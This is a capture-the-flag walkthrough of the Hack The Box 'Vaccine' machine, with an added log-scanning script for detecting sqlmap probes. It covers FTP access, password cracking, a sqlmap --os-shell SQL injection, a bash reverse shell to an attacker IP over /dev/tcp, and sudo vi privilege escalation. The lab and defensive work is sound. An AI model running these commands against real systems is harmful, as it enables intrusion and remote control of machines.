As usual let's start with nmap:
nmap -sV -sC IP
Replace IP with the IP of your target machine (Vaccine).
The IP of the target machine changes regularly, so make sure you type the correct one. You can find it on your Hack The Box account.
We can see that port 21 (FTP) is open and that anonymous FTP login is allowed, so let's try that.
When prompted for a username, type anonymous and press enter
You will now be prompted to enter the password
For the password just press enter.
We have now successfully logged in using anonymous as the username and with no password!
We can see that there is a file called backup.zip. Let's try to download it to our VM using:
The zip file should now be saved on your VM. Just go to your home directory
We collected what we needed so we can now exit the ftp session by typing:
Let's now open a new command prompt window and type:
Let's now try to unzip the zip file by typing:
It is asking for a password to unzip the file. Just press enter
We do not have the password, but let's use John The Ripper to crack it.
If you are not familiar with John The Ripper, or if you need a quick refresher, check out my short post on the basics before continuing.
zip2john backup.zip > hash.txt
john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt hash.txt
john --show hash.txt
We cracked the password! The password is 741852963
Now let's try to unzip it again.
Type in the password:
and press enter
The zip file contained 2 files:
index.php and style.css
Let's check them out:
Looks like we found some credentials: the username admin and its password hash.
We can use CrackStation to find out the password:
- Go to https://crackstation.net/
- Copy the hash we just found 2cb42f8734ea607eefed3b70af13bbd3
- Paste it into the password hash cracker
- Tick I'm not a robot
- Click on Crack Hashes
We cracked the password!
The password is qwerty789
When we ran our nmap scan earlier, we also found that port 80 (HTTP) was open. So let's open a new browser window from our VM to check it out by typing in the URL bar:
We are asked for credentials to log in. Let's try the ones we just found:
and click on Sign In
We are in!
The website holds a Car Catalogue. Note the URL is http://10.129.247.166/dashboard.php
Now let's try to look for a specific car name. In the search field, type the word Sandy for instance and press enter.
We can now see the URL changed to http://10.129.247.166/dashboard.php?search=sandy
We can test it out with a few different searches, but it looks like a query is built using
?search= followed by whatever we typed into the search bar.
This might be connected to a database, so let's use sqlmap to see if it is vulnerable to SQL injection.
First let's find the cookie session.
To do that, right-click on the page and select Inspect Element.
Now click on the Storage tab.
The PHPSESSID should be displayed as per below:
Note that your PHPSESSID will be different from mine.
If you are not familiar with sqlmap or if you need a quick refresher, check out my short post on the sqlmap basics before continuing with this machine.
Let's use our sqlmap:
sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell
We got the shell!
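From the defender's side, a sqlmap run like the one above leaves a distinctive trail in the web server's access log: requests to dashboard.php whose search parameter carries SQL metacharacters, usually sent with sqlmap's default User-Agent. The script below is an added example (not part of the original walkthrough) that flags such lines; the Apache combined log format is assumed, and the two sample lines are constructed, not captured from the machine.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache combined log format (assumed): ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Tokens that rarely occur in a genuine car-name search but are typical of
# automated injection testing against a PostgreSQL-backed page.
SQLI_MARKERS = re.compile(
    r"(['\"]|--|/\*|;|\bunion\b|\bselect\b|\bpg_sleep\b|\bor\s+\d+=\d+)",
    re.IGNORECASE,
)

# Constructed sample lines: one normal search, one bare-quote probe sent by sqlmap.
SAMPLE_LOG = [
    '10.10.14.35 - - [01/Jan/2024:12:00:00 +0000] "GET /dashboard.php?search=sandy HTTP/1.1" '
    '200 1234 "-" "Mozilla/5.0"',
    '10.10.14.35 - - [01/Jan/2024:12:00:05 +0000] "GET /dashboard.php?search=sandy%27 HTTP/1.1" '
    '200 1234 "-" "sqlmap/1.6"',
]

def flag_request(line):
    """Return the reasons a log line looks like SQLi probing (empty list = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable line"]
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    parsed = urlparse(m["url"])
    if parsed.path.endswith("/dashboard.php"):
        # parse_qs percent-decodes, so %27 is examined as a literal quote.
        for value in parse_qs(parsed.query).get("search", []):
            if SQLI_MARKERS.search(value):
                reasons.append(f"SQL metacharacters in search={value!r}")
    return reasons

def scan_log(lines):
    """Return (client_ip, reasons) for every line that trips at least one rule."""
    findings = []
    for line in lines:
        reasons = flag_request(line)
        if reasons:
            m = LOG_RE.match(line)
            findings.append((m["ip"] if m else "?", reasons))
    return findings
```

A legitimate search containing an apostrophe (a name like O'Neil) will also trip the metacharacter rule, so in practice correlate hits with the User-Agent and the request rate per client before alerting.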
Now open a brand new command prompt window and type:
nc -lnvp 4444
Now, return to your sqlmap shell and type:
bash -c "bash -i >& /dev/tcp/10.10.14.35/4444 0>&1"
The IP 10.10.14.35 is the IP of the attacking virtual machine, i.e. the VM you are running these commands from. Yours will be different from mine. If you don't know the IP of your VM, open a new command prompt window and type ifconfig
Just press enter
Now let's return to our netcat and we should have a session!
We got the shell! Now let's make the shell stable using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
You got the flag!
As usual with privilege escalation, let's start with:
It is asking us for the password, and we don't have it.
Let's try to find the password in the directory /var/www/html
Let's check out dashboard.php
cat dashboard.php | grep password
We found the password for the user postgres.
We can keep trying from here, but the shell might die soon, so let's use the credentials we found to SSH in directly.
Let's open a new command prompt window. We know from the nmap scan at the beginning that port 22 (SSH) is open. And we now have the credentials for the user postgres!
10.129.247.166 is the IP of the target machine. The IP of the target machine changes all the time so yours will be different.
We are now prompted to enter the password for the username postgres.
The password is:
We are in!
We can find the user.txt file here too.
Enter the password again
So it seems we are able to edit pg_hba.conf with sudo using the vi text editor. Let's now type:
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
We can escalate our privileges using the following command:
Now we get the shell!
Congratulations! You got the root flag!